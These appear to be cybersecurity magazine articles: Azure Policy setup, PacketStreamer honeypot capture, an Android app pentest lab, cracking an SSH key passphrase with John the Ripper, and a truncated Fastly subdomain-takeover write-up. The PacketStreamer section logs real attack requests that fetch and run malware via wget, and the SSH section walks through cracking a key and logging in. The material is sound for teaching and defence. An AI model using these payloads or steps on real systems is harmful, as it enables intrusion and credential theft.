    "effect": "[parameters('effect')]"
  }
}

Now, we are going to verify that the JSON is correctly structured and import it into our Azure account. For this, we will need:

  • PowerShell 7.0.6 LTS or PowerShell 7.1.3
  • Install the latest version of PowerShell available for your operating system
  • The PowerShell script execution policy must be set to RemoteSigned or less restrictive:
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Use the Install-Module cmdlet, as it is the preferred installation method for the Az PowerShell module.

Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force

Once we have all these points covered, we connect to our Azure account.

  1. Connect to your Azure account with PowerShell:

Connect-AzAccount

  2. Select the subscription to work with:
Get-AzContext
Set-AzContext -Subscription "NAME OF YOUR SUBSCRIPTION"
  3. The command to create a new Azure policy definition is:
$definition = New-AzPolicyDefinition -Name "" -DisplayName "" -description "" -Policy '' -Parameter '' -Mode

The mode can be indexed or all; this will determine what types of resources are evaluated by the policy.

all: evaluate resource groups, subscriptions, and all resource types

indexed: only evaluate resource types that support tags and location

I recommend uploading the files to a GitHub repository and, using the raw view, indicating the path where each file is located:

$definition = New-AzPolicyDefinition -Name "test" -DisplayName "Test" -description "Test" -Policy 'https://raw.githubusercontent.com/asanchezpaulete/Articles/main/Azure%20Policies/rules.json' -Parameter 'https://raw.githubusercontent.com/asanchezpaulete/Articles/main/Azure%20Policies/parameters.json' -Mode Indexed

And, as we can see in the Azure Portal, it has been created.

We are now going to check that it works: we will try to create a resource without the tag to see if it lets us. Remember that the default effect is “Deny”.

To do this, we will first create a resource group to which we will assign this policy.

Home > Policy > Select policy > Assign

We will indicate the following:

  • Scope
  • Exclusions (if any)
  • Parameters to select the policy mode
  • In our case, we will not apply any remediation task, since our goal is to prevent us from creating the resource without the tag
  • Non-compliance message that will appear to the user who tries to break this rule

We proceed to create a vnet without the tag:

In the validation step, it will indicate that the test has not passed and that we should review the details, where we can see that the policy is preventing the creation of this vnet with this configuration:

Let's create it now with the tag set to the required value:

And with the tag in place, we pass the validation phase:

But Azure Policies are not only for denying the creation of resources that do not comply with a certain structure; they can also be used to analyze an already deployed infrastructure, or run in "Audit" mode to evaluate compliance without applying any deny or modify effect. To do this, we must keep in mind that evaluations of assigned policies and initiatives happen as the result of various events:

  • A policy or initiative is newly assigned to a scope (takes around 30 minutes)
  • A policy or initiative already assigned to a scope is updated
  • A resource is deployed or updated within a scope with an assignment via Azure Resource Manager, REST API, or a supported SDK
  • A subscription is created or moved within a management group hierarchy with an assigned policy definition targeting the subscription resource type
  • A policy exemption is created, updated or deleted
  • Standard compliance evaluation cycle (once every 24h)
  • The guest configuration resource provider is updated with compliance details by a managed resource
  • On-demand scan

To launch an evaluation on demand, we can use either of the following:

  • Azure CLI
az policy state trigger-scan --resource-group "YOUR_RESOURCE_GROUP"

  • PowerShell
$job = Start-AzPolicyComplianceScan -AsJob
$job

In general, the results of a policy evaluation will be compliant or non-compliant.

When a resource is non-compliant, Azure provides us with three ways to look for information about why (a small scripted example follows this list):

  • Compliance details
  • Change history
  • Custom PowerShell Script
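
As a small teaser, here is a Python sketch that pulls the non-compliant resources of a resource group through the Azure CLI (it assumes az login has already been run; the resource group name is a placeholder and the output field names may vary slightly between CLI versions):

# Sketch: list non-compliant resources in a resource group via the Azure CLI.
# Assumes the Azure CLI is installed and already logged in.
import json
import subprocess

result = subprocess.run(
    [
        "az", "policy", "state", "list",
        "--resource-group", "YOUR_RESOURCE_GROUP",
        "--filter", "complianceState eq 'NonCompliant'",
        "--output", "json",
    ],
    capture_output=True, text=True, check=True,
)

for state in json.loads(result.stdout):
    print(state.get("resourceId"), "->", state.get("policyDefinitionName"))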

But this is for another article, along with the Policies with Remediation Task and managed identities and service principals…

 

by Owen Garrett, Deepfence

PacketStreamer is an open source project from Deepfence.  It performs distributed packet capture (tcpdump-like) and aggregates the pcap data in a single pcap file.  PacketStreamer supports a wide range of environments, including Kubernetes nodes, Docker hosts, Fargate instances and, of course, virtual and bare-metal servers.

Network packet capture is a well understood practice. The basic technology that modern tools are built on first appeared in a tool named ‘tcpdump’, released in 1988, and the associated file format (pcap) has stood the test of time.

Although the technology has changed little, modern compute environments are very different from the single-Unix-server assumptions that defined the design of tcpdump.  Modern environments are cloud-based, distributed across many servers, and use virtualization technologies that make it difficult to run kernel tools such as tcpdump directly.

PacketStreamer applies contemporary network capture to modern, cloud-native environments. It captures traffic from large numbers of remote servers (for example, cloud nodes) and collects that traffic in one place. It supports modern stacks, such as Kubernetes (via a daemonset), Docker, and AWS Fargate, as well as standard hosts.

Use PacketStreamer if you need a lightweight, efficient method to collect raw network data from multiple machines for central logging and analysis:

  • Debugging: intermittent errors are happening and your log files don’t reveal enough details. You need to gather network traffic to see what requests your servers are processing.
  • Forensics: you want to capture traffic to sensitive services for storage and later inspection in the event of an investigation. 
  • Threat hunting: you want to identify any unusual behavior that may indicate the presence of adversaries. 
  • Machine learning: you need to capture large volumes of network traffic from many production servers to train machine learning engines to recognize normal and anomalous traffic.

Getting Started with PacketStreamer

We’ll share a walkthrough of building, installing and running PacketStreamer, and see what we find.

We’ll start with four cloud servers.  Three are honeypot servers, running WordPress, a simple NGINX hello-world, and honeydb.io.  The fourth will be our receiver server where we aggregate and analyze the packet data.

Build PacketStreamer

On the build (receiver) server, let’s clone the source and build PacketStreamer.  It’s a standalone Golang app, and we’ll statically-link the build to make it as portable as possible:

# install the necessary build tools (Debian/Ubuntu; other OSs will differ)

sudo apt install -y build-essential golang-go libpcap-dev

# Get the source (github) and build a statically-linked binary

git clone https://github.com/deepfence/PacketStreamer.git

cd PacketStreamer/

make STATIC=1

# verify we have a statically-linked binary

file packetstreamer

packetstreamer: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, not stripped

Deploy the receiver

In one terminal on the receiver server, let’s start the PacketStreamer receiver process and pipe the pcap output into tshark.  We can use the included receiver-stdout.yaml configuration file, which configures the receiver to accept traffic on port 8081:

./packetstreamer receiver \
--config ./contrib/config/receiver-stdout.yaml | tshark -r - -Y http

The PacketStreamer receiver process will run quietly, waiting for connections from remote PacketStreamer sensors.  Pcap output from PacketStreamer will be piped to the tshark tool.

You could instead write the output to a file for later analysis, or even tee it to a file while watching using tshark. That way, you can quickly spot anomalies (tshark output) and investigate the full packet dump.

Deploy the sensors

Now, let’s deploy the sensors on each of our target servers.  We first need to create a simple configuration file sensor-remote.yaml that identifies the location of the remote receiver:

output:
  server:
    address: 12.34.56.78
    port: 8081
pcapMode: all

Copy the PacketStreamer binary and the sensor-remote.yaml configuration file to each of the target servers:

scp packetstreamer sensor-remote.yaml user@wordpress:/tmp
scp packetstreamer sensor-remote.yaml user@nginx:/tmp
scp packetstreamer sensor-remote.yaml user@honeypot:/tmp

Then run the sensors on the remote machines:

ssh root@wordpress

# as root on the target machine:
/tmp/packetstreamer sensor --config /tmp/sensor-remote.yaml 

Repeat for the nginx and honeypot machines.

Analyzing the results

We ran the sensors and receiver for 24 hours, looking for interesting HTTP requests (tshark -Y http) to the target servers.  We saw hundreds of drive-by attempts from dozens of different IP addresses, trying to find unprotected secrets, locate vulnerable control panel components, use injection to install malware, and so on.

Requests ranged from an innocuous-looking ‘GET http://example.com/’, to much more significant attempts; a small selection of the captured traffic is listed below (IP addresses obfuscated):

HTTP 295 GET /.env HTTP/1.1

HTTP 307 GET /.aws/credentials HTTP/1.1

HTTP 86 POST /.aws/credentials HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 599 POST /boaform/admin/formLogin HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 335 GET /_ignition/execute-solution HTTP/1.1

HTTP 292 GET //robots.txt HTTP/1.1

HTTP 306 GET //.well-known/security.txt HTTP/1.1

HTTP 293 GET //sitemap.xml HTTP/1.1

HTTP 176 GET http://example.com/ HTTP/1.1

HTTP 796 GET /Rh-aD.nSuH_ HTTP/1.1

HTTP 941 GET /yTHlRfsRgMPOmMR2kd4Hc765I/mC/mqqE3ohONMZfZP0WUJFGFSGhlX/j1?KAwuc=ymn5Jdu96Iip_MOYa9.dTr3U7Yc&wpaCkwFkjcIU=0llrN&E0LYUK=cn.X2DT4AKByeQVWUK-gOED5Vk HTTP/1.1

HTTP 416 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 86 POST /assets/images/get.php HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 573 GET /dup-installer/main.installer.php HTTP/1.1

HTTP 296 GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.19/jaws;sh+/tmp/jaws HTTP/1.1

HTTP 302 GET /actuator/gateway/routes HTTP/1.1

HTTP 336 GET /shell?cd+/tmp;rm+-rf+*;wget+http://13.25.90.45:34416/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

HTTP 302 GET /.git/config HTTP/1.1

HTTP 86 POST /assets/images/go.php HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 378 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

HTTP 506 POST /cgi-bin/ViewLog.asp HTTP/1.1  (application/x-www-form-urlencoded)Continuation

HTTP 385 POST /GponForm/diag_Form?images/ HTTP/1.1

HTTP/XML 673 POST /Autodiscover/Autodiscover.xml HTTP/1.1

HTTP 307 GET /solr/admin/info/system?wt=json HTTP/1.1

HTTP 320 CONNECT 46.38.62.96:443 HTTP/1.1

HTTP 327 CONNECT t2.proxy-checks.com:443 HTTP/1.0

HTTP 391 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1

HTTP 363 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1

HTTP 307 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1

HTTP 191 GET /manager/text/list HTTP/1.1

HTTP 418 GET /config/getuser?index=0 HTTP/1.1

You can store the results locally in a pcap file for more detailed, later analysis, or (feature in development) write them to an S3 bucket.  You can analyze them using any tool that can process pcap data.
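
For example, if the receiver's output was saved to a file such as capture.pcap instead of being piped to tshark, a few lines of Python with scapy are enough to pull the HTTP request lines back out of it (a minimal sketch; the file name is an assumption):

# Sketch: extract HTTP request lines from a pcap written by the receiver.
# Assumes the receiver output was saved as capture.pcap; requires scapy.
from scapy.all import rdpcap, Raw, TCP

for pkt in rdpcap("capture.pcap"):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        first_line = payload.split(b"\r\n", 1)[0]
        if first_line.startswith((b"GET ", b"POST ", b"HEAD ", b"CONNECT ")):
            print(first_line.decode(errors="replace"))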

Conclusion

PacketStreamer was developed by Deepfence as part of a bigger observability and security analytics product.  We’ve open-sourced it because, to the best of our knowledge, there are no existing tools that capture and merge multiple pcap streams, and function across Kubernetes, Docker, Fargate and operating system environments.  

We’d welcome any feedback, contributions and suggestions. Please start with the PacketStreamer GitHub repository, and feel welcome to join the Deepfence Community Slack.

by Gabrielle Botbol 

About the author

Gabrielle Botbol is a pentester, cybersecurity blogger, and podcaster (CS by GB - Cybersecurity By Gabrielle B).

She created a self-study program to become a pentester.

Gabrielle Botbol focuses her efforts on democratizing information security for all.

She is a board member of Ecole Cyber in Montreal.

She was honored for her contributions to the cyber community by being named one of the top 20 women in cybersecurity in Canada in 2020, and Pentest Ninja by the Women’s Society of Cyberjutsu in 2021.

She is mindful of the immense work that needs to be done to protect our privacy, our economy, our democracy, and our sovereignty. Her mantra is “Action for Cyber Peace”. Building it a little bit every day.

Introduction

Mobile pentesting is part of a pentester's testing routine; however, it is not widely documented. At one time or another, every pentester has to conduct mobile pentests, because the demand keeps growing. This article deals with an essential part: how to set up a lab to test Android applications. I will also present the process of pentesting an Android application and give some practical examples.

Note 

This article will not cover certificate pinning, however, you will find in the resources a few links about the subject.

The Android application I used for the examples is PIVAA, a deliberately vulnerable application. You can get it here and hack it; it was made for this purpose :D https://github.com/htbridge/pivaa 

All the installs and setups were made on Ubuntu.

How to set up the lab

In order to set up the lab, we will need to install the following tools:

  • JADX-GUI
  • adb
  • Android Studio
  • BurpSuite (Community edition works fine)

How to install JADX

In order to install JADX, you need to make sure you have Java installed. If not, you can install it with:

sudo apt install default-jdk

Once this is done, you can install JADX using this command:

sudo apt install jadx 

Finally, you can launch it using (jadx-gui binary is located here: jadx/bin):

./jadx-gui

For more information on jadx or the installation instructions for other systems, check out this link: https://github.com/skylot/jadx 

How to install adb

To install adb you just need to do:

sudo apt-get install adb  

The developers Documentation on adb is complete, check it out here: https://developer.android.com/studio/command-line/adb 

For installation instructions on other systems, check out this link: https://www.xda-developers.com/install-adb-windows-macos-linux/ 

How to install Android Studio

Android Studio’s installation is pretty straightforward:

  1. Go to this link: https://developer.android.com/studio
  2. Click on download (it should be appropriate to your OS)

Then you should be good to go!

How to setup an emulator on Android Studio

In order to set up an emulator, you need to:

  1. Go to AVD Manager:
  2. Click on “Create Virtual Device”
  3. Choose a phone you like:
  4. Click on next and in the next screen click on x86 Images.
  5. Choose an image with an API level adapted to the application you are going to test (I am going to use API 26 for this example). You might need to download the image first; make sure it has Google APIs specified.
  6. Once downloaded, you can select it and click next and then finish.

For now, you will be able to launch it using the start button:

How to install BurpSuite

As for Android Studio, to install BurpSuite (Community edition), you just need to go to this link: https://portswigger.net/burp/releases/professional-community-2021-12-1?requestededition=community and get the proper version for your operating system.

How to setup BurpSuite with the emulator

In order to intercept the request with BurpSuite, we have some setup to do.

In BurpSuite, we need to download the certificate:

  1. Go to the Proxy tab then click on Options
  2. Click on the Import / Export CA certificate button
  3. Check the Certificate in DER format option then click on Next
  4. Choose a file with the Select file ... button and rename it as you wish but change the extension to “.cer”.

The certificate is now exported in the folder you have chosen and you should see the message:

Now we have to drag and drop it into the emulator. Once it is copied, we have to install it in the emulator. Note that I am using a Nexus 5 with API 23; the process might differ with another emulator.

  1. Go to Settings> Security
  2. Click on Install from SD card:
  3. The certificate should be in Internal storage > Download. Double click on it:
  4. Name it and click OK.
  5. It is going to ask you to set a lock screen PIN code; click OK and proceed. I usually do not set a PIN to start the device
  6. Type and confirm your PIN. It should say that the certificate is installed.
  7. Accept the warning by clicking OK.

Now we have to set up the proxy settings of the emulator.

  1. Click the three dots on the side of the emulator:
  2. Go to Settings, open the Proxy tab, enter the following configuration and click Apply:

Now we have to go on Burp:

  1. Within the Proxy tab, click on the Options subtab and in the Proxy Listeners section, click on the Add button, and set it up as follows:

And then click OK and Yes.

Your table of proxy listeners should look like this:

Now that the installation and configuration are done, we can dive into the pentest process. 

Usual process for Android application pentest

I am not going to cover the reconnaissance phase as it is similar to many other pentest types. 

So once you have done the reconnaissance phase, you can start to dive into your application pentest.

The other steps are: Static Analysis, Dynamic Analysis and, of course, the report.

Static Analysis

To process the static analysis, we are going to use jadx-gui.

Once you have launched JADX, you will be greeted with this window:

Choose the desired APK (in our case, pivaa.apk) and click on Open File.

You will then be able to navigate in the source code:

The Android XML manifest

An interesting file to check is AndroidManifest.xml. You can find it here:

This file is the place where the developers will describe essential information about the application. As stated in the Android’s developer documentation:

“Every application project must have an AndroidManifest.xml file (with precisely that name) at the root of the project source set. The manifest file describes essential information about your application to the Android build tools, the Android operating system, and Google Play.” (reference: https://developer.android.com/guide/topics/manifest/manifest-intro)

This will be used to mention the application package’s name, its components, the permissions, and the hardware and software this application needs.

Note that it is also useful to check which API level we need to test the application against, by looking at the minSdkVersion attribute in the manifest.

In PIVAA, for example, you can see here all the permissions required by the application:

    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.READ_PROFILE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.NFC"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>

As the goal of permissions is to protect the privacy of the user, you might see some permissions here that should not be allowed, depending, of course, on the purpose of the application. The full list of permissions is available online: https://developer.android.com/reference/android/Manifest.permission 

Allow backup

The allowBackup flag could allow an attacker to take a backup of the application’s data with adb. So it is safer to set it to false, and beware that, as mentioned in the OWASP documentation, if this attribute is not explicitly set, it is enabled by default! (https://github.com/OWASP/owasp-mstg/blob/8d67a609ecd095d1bb00aa6a3e211791af5642e8/Document/0x05d-Testing-Data-Storage.md#static-analysis-7).

In our example on PIVAA it is set to true:

android:allowBackup="true"

Debuggable

This flag indicates whether the application can be debugged. It should be set to false, otherwise an attacker could use it to access the application's data. Be aware that sometimes your customer will give you the developer version of the application, so this flag will be set to true; what I usually do in this case is report it as informational, as a reminder for the customer to make sure they change it before the application is delivered to production.

In our example on PIVAA, this is set to true:

android:debuggable="true"

OWASP provides useful documentation about this topic:

https://github.com/OWASP/owasp-mstg/blob/53ebd2ccc428623df7eaf2361d44b2e7e31c05b9/Document/0x05i-Testing-Code-Quality-and-Build-Settings.md#testing-whether-the-app-is-debuggable-mstg-code-2 

Which activities are exportable

Activities are the screens of an application. Depending on the application and the activity, some of them should not be exported, because that means they could be accessed from outside the application. So we need to check whether these exported components disclose sensitive data.

In our example, three components are exported:

  <service android:name="com.htbridge.pivaa.handlers.VulnerableService" android:protectionLevel="dangerous" android:enabled="true" android:exported="true"/>
        <receiver android:name="com.htbridge.pivaa.handlers.VulnerableReceiver" android:protectionLevel="dangerous" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="service.vulnerable.vulnerableservice.LOG"/>
            </intent-filter>
        </receiver>
        <provider android:name="com.htbridge.pivaa.handlers.VulnerableContentProvider" android:protectionLevel="dangerous" android:enabled="true" android:exported="true" android:authorities="com.htbridge.pivaa" android:grantUriPermissions="true"/>

General tips

Other than what we just saw, here are some general tips on what to look for during static analysis.

  • It is also worth checking the strings.xml file
  • We can also try to enumerate a database (there is even a tool for this: Firebase Enum https://github.com/Sambal0x/firebaseEnum)
  • Enumerate public resources in the cloud (see this tool: Cloud Enum https://github.com/initstring/cloud_enum)
  • Look for secret keys, credentials, comments, URLs, IP addresses, private keys, and any other sensitive information that should not be in the code.

With JADX-GUI you can also use the global search to look up specific strings, for example: API, API_KEY, pass, key, ClientId, ClientSecret, id, AWS, Secret, username, firebase.io, http, https, SQL (and extensions for SQL files like .db, .sqlite, etc.). You can also script this kind of search, as sketched after the steps below.

Here is how to do this:

  • Click on this little button on the top left:
  • Type the String you are looking for:
  • Check out the results!
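
And here is the scripted alternative mentioned above: a minimal sketch that greps the decompiled sources for a few of those keywords, assuming the code was first exported with jadx -d pivaa_src pivaa.apk (the output directory name is just an example).

# Sketch: grep jadx-decompiled sources for interesting keywords.
# Assumes the sources were exported first with: jadx -d pivaa_src pivaa.apk
import os
import re

KEYWORDS = re.compile(
    r"API_KEY|ClientSecret|password|passwd|secret|AWS|firebase\.io|https?://",
    re.IGNORECASE,
)

for root, _, files in os.walk("pivaa_src"):
    for name in files:
        if not name.endswith((".java", ".xml", ".json", ".properties")):
            continue
        path = os.path.join(root, name)
        with open(path, errors="ignore") as f:
            for lineno, line in enumerate(f, 1):
                if KEYWORDS.search(line):
                    print(f"{path}:{lineno}: {line.strip()}")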

In our example in PIVAA, we are able to find the database using this trick (we could also have checked the data/data directory right away; that is one of the things we should do during an Android application pentest anyway):

So now we know that we have a class called DatabaseHelper.

So the next step here would be to find this database in the emulator.

We can look for this either by using adb shell or simply by checking the data folder in the Device File Explorer in Android Studio, where we can find our databases here:

(data/data/com.htbridge.pivaa/databases):

So now we just have to pull the files using adb:

user ~/folder/mobile $ adb pull /data/data/com.htbridge.pivaa/databases/pivaaDB
/data/data/com.htbridge.pivaa/databases/pivaaDB: 1 file pulled. 7.5 MB/s (20480 bytes in 0.003s)

We can use SQLiteBrowser to read it (install it with sudo apt install sqlitebrowser):

user ~/folder/mobile $ sqlitebrowser pivaaDB

And we can see the data and the tables:

In general, database files are useful to check for Insecure Data Storage (see here for more information: https://owasp.org/www-project-mobile-top-10/2014-risks/m2-insecure-data-storage)

In our example, this is a vulnerability for the following reason:

“The mobile application uses an unencrypted SQLite database. This database can be accessed by an attacker with physical access to the mobile device or a malicious application with root access to the device. The application should not store sensitive information in clear text.” (PIVAA documentation: https://github.com/HTBridge/pivaa#cleartext-sqlite-database)
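
If you prefer the terminal over SQLiteBrowser, a few lines of Python (standard library only) will dump the same information from the pulled file:

# Sketch: dump table names and rows from the pulled PIVAA database (stdlib only).
import sqlite3

con = sqlite3.connect("pivaaDB")
tables = [row[0] for row in
          con.execute("SELECT name FROM sqlite_master WHERE type='table'")]

for table in tables:
    print(f"== {table} ==")
    for row in con.execute(f"SELECT * FROM {table}"):  # fine for a local copy we control
        print(row)

con.close()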

For more information on static analysis, check out HackTricks: https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting#static-analysis 

Dynamic Analysis

Once you are all set up with Burp, following the setup process I showed earlier, you can start the dynamic analysis.

General tips

Here are some of the things you can check:

  • Are screens containing sensitive data visible in screen captures and instance captures when the application is backgrounded?
  • Tapjacking
  • And all the usual Web application vulnerabilities (OWASP Top 10)

For more information on dynamic analysis, you can check the following links:

Example of vulnerability

In the application you are testing, go to a screen in which you have sensitive data (for this demo it is not actually the case, but let us assume it for the sake of the example). In PIVAA, I am going to use the About the Application page.

When you use another application or tap the Home button, the application you are currently using is sent to the background. If you were looking at a screen with sensitive data and that screen still shows when you check the list of backgrounded applications, it is a vulnerability you have to report.

Here is how it looks:

  • Here I am using the application:
  • I click on the Home button to check something else on the phone
  • If I check the backgrounded application, I can see that PIVAA has kept a capture of the page I was currently looking at in the background:

This should not happen if the screen contains sensitive data. An additional check can be made in the static analysis step of the process by checking if the FLAG_SECURE is set (see here for more info: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#static-analysis-8).

How to report what you find

Structure of a pentest report

Here is what a pentest report should look like:

Executive summary

The executive summary is the part addressed to the executives of the company who will read the report. It needs to be a high-level explanation with no technical detail, and it presents an overall posture that explains why the findings, and the ways they can be combined, could impact the company.

Vulnerability report

The vulnerability report will have all the elements you see on the picture above.

  • Severity: The severity is usually in one word: low, medium, high or critical.
  • Score: The CVSS Score or OWASP risk rating score. This can be calculated with dedicated online tools (https://www.first.org/cvss/calculator/3.0 or https://www.owasp-risk-rating.com/). 
  • Affected item: The detailed description of the affected item.
  • Description: A detailed description with technical details on how the flaw can be reproduced.
  • Remediation: An explanation on how to correct it.
  • Evidence: A screen capture and/or request and/or response as evidence of the exploitation that you were able to conduct (during the attack phase, you should have taken as many notes as possible along with screenshots and request/response from Burp, anything useful to prove the vulnerabilities and allow the person who will read your report to reproduce the exploit).

Example of a vulnerability report part

Let’s see the vulnerability report part more precisely with the example.

  • Information disclosure through backgrounded screens of the application

Severity: Low

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Description

In order to provide visual transitions in the interface, Android records a screenshot of the current application screen. This happens when an application is suspended, when the button that leads to the main menu is pressed, when receiving a call, or any other event that may interrupt the application. These captures can contain user information or other sensitive data.

Also, the application does not leverage the FLAG_SECURE setting to protect sensitive data that should not be leaked.

This way, the attack surface of the mobile application is expanded. Confidential information can be persisted on the mobile device through this mechanism.

Resource https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06d-Testing-Data-Storage.md#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9 

Remediation

Using the FLAG_SECURE setting on screens with sensitive data will prevent their contents from appearing in backgrounded screenshots.

Evidence

  • Sensitive data shown in the backgrounded application:

 

Thanks for reading, I hope you enjoyed this article.

Resources


Crack SSH Private Key with John the Ripper

by Anastasis Vasileiadis


The passphrase on an SSH private key should not be just a decoration. Unfortunately, some people think they will never lose their SSH private key and neglect to protect it with a strong passphrase.

In the guide 10 simple steps for a secure SSH we looked at the SSH (Secure Shell) protocol, which is used for secure (encrypted) connections to remote computers and servers. It is used not only to execute commands in the server's terminal, but also to transfer files to and from the server (e.g. with FileZilla) or even to stream audio over SSH.

So you can understand its “power” from the above, and how important it is to keep SSH secure. Unfortunately, some do not realize the seriousness of the issue, suffer from the “it will never happen to me” syndrome, and their servers become pawns of something like the FritzFrog botnet, a sophisticated peer-to-peer (P2P) botnet that compromises SSH servers.

As for the SSH passphrase and what a strong one looks like, you don't need much education: three or four simple words joined by punctuation marks is a good, secure model for passwords and passphrases.

Password Strength
source: https://xkcd.com/936/

Just make sure you remember the passphrase. In the following scenario, we'll see what happens if you haven't hardened a new server with basic security settings in the first 10 minutes, or if you managed to lose an SSH private key that you protected with a weak passphrase.

Install SSH2John on your computer

SSH2John is a Python script that converts an SSH private key into a hash format John the Ripper can work with. If you do not have the Jumbo version of John the Ripper installed, you will need to download ssh2john from GitHub, as it is not included on Kali Linux. If you don't have John the Ripper installed at all, you can learn how to install it from its GitHub page.

We open a terminal and download it:

~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
--2020-09-01 12:26:03--  https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
HTTP request sent, waiting for response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: 'ssh2john.py'
ssh2john.py 100%[=======================>] 7.64K --.-KB/s in 0s

Now let's crack the SSH private Key.

Crack the private key

All we need to do is run the ssh2john tool against the private key and redirect the results to a new hash file using:

python ssh2john.py id_rsa > id_rsa.hash

Next, we'll use John the Ripper to crack the password. But first, we need a proper wordlist. For the purposes of this guide, we will use a small one with 100 words, to show how to do it in a simple way. Download it:

~# wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top100.txt

Now run John on Kali Linux as usual, feeding it the wordlist and hash file:

john --wordlist=darkweb2017-top100.txt id_rsa.hash


Note: This format may emit false positives, so it
will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key
for status
1q2w3e4r5t (id_rsa)
Session completed

We can see that it recognized our password, but to be sure, let's use the --show option to verify it:

john --show id_rsa.hash
id_rsa:1q2w3e4r5t
1 password hash cracked, 0 left

As you can see, even 1q2w3e4r5t, which to the untrained eye may seem hard to crack, is (unfortunately for those who use it) just a matter of vocabulary.
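
If you only have a handful of candidate passphrases, or want to double-check John's result, the same guess can also be confirmed directly in Python with paramiko; a small sketch, assuming an RSA key and the same wordlist in the current directory:

# Sketch: try candidate passphrases directly against id_rsa with paramiko.
# Assumes an RSA key and darkweb2017-top100.txt in the current directory.
import paramiko
from paramiko.ssh_exception import SSHException

with open("darkweb2017-top100.txt") as f:
    candidates = [line.strip() for line in f if line.strip()]

for passphrase in candidates:
    try:
        paramiko.RSAKey.from_private_key_file("id_rsa", password=passphrase)
        print(f"[+] passphrase found: {passphrase}")
        break
    except SSHException:
        continue  # wrong passphrase, try the next candidate
else:
    print("[-] no passphrase in the wordlist worked")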

SSH access to the victim

With the key cracked, all that remains is to use it against the target it belongs to. Using the -i option of the SSH command, we can specify the private key to use for authentication:

ssh -i id_rsa user@10.10.10.10
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
luser@10.10.10.10's password

It won't let us use the key if the permissions are too ... loose. So all we have to do is set stricter permissions on the private key:

chmod 400 id_rsa

Now we are able to connect. We enter the password that we cracked, and the output shows that we are connected:

~# ssh -i id_rsa nullbyte@10.10.10.10
Enter passphrase for key 'id_rsa':
Last login: Tue Sep 1 15:20:16 2020 from 10.10.10.1
luser@target:~$

Epilogue

In this short guide, we have seen how one can crack SSH passwords.

In most cases, these attacks are carried out massively and automatically, and SSH keys are cracked like lettuce leaves if we do not pay attention to the overall security of our systems while clinging to the illusion that having a Linux server means we are safe. As you may have read in Enough with the FUD about Linux security holes, security is not a finished product but an ongoing process.

Fastly Subdomain Takeover $2000

Bug Bounty — From zero to HERO

by Alexandar Thangavel AKA ValluvarSploit


# Passive Subdomain Enumeration using Google Dorking
site:*.redacted.com -www -www1 -blog
site:*.*.redacted.com -product

# Passive Subdomain Enumeration using OWASP Amass
amass enum -passive -d redacted.com -config config.ini -o amass_passive_subs.txt

# Subdomain Brute force using Gobuster
gobuster dns -d redacted.com -w wordlist.txt --show-cname --no-color -o gobuster_subs.txt
# Merging subdomains into one file
cat google_subs.txt amass_passive_subs.txt gobuster_subs.txt | anew subdomains.txt
# Enumerate CNAME records
./cname.sh -l subdomains.txt -o cnames.txt

# We can use the httpx tool as well to collect CNAMEs
httpx -l subdomains.txt -cname -o cnames.txt
# Probe for live HTTP/HTTPS servers
httpx -l subdomains.txt -p 80,443,8080,3000 -status-code -title -o servers_details.txt
# DNS query for CNAME record
dig next.redacted.com CNAME

https://next.redacted.com [500] [246] [Fastly error: unknown domain next.redacted.com]
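When probing many hosts at once, potential takeover candidates can be filtered straight out of the httpx results by searching for Fastly's error string; a minimal sketch, assuming the probe output was saved to servers_details.txt as above:

# Hosts whose response title contains Fastly's "unknown domain" error are takeover candidates
grep -i "fastly error: unknown domain" servers_details.txt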

 

Claim the domain on Fastly, then host the proof-of-concept page:
mkdir hosting

cd hosting

nano index.html
